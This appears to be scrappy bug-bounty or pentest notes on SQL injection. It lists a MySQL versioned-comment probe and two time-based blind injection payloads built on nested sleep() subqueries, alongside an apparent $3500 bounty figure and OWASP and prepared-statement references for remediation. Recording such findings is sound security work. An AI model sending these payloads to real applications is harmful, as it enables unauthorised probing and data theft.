/*!50000someInvalidSQLSyntax*/



$3500
********************************************
,(select*from(select(sleep(10)))a) -- -
********************************************







'%2b(select*from(select(sleep(20)))a)%2b'


Refrences:
-------------

	How to use prepared statements depends on the programming language you are using to code your applications. Wikipedia provides a few examples:
		https://en.wikipedia.org/wiki/Prepared_statement.

	For more information about SQL input sanitization, read OWASP’s cheat sheet at:
		https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html

	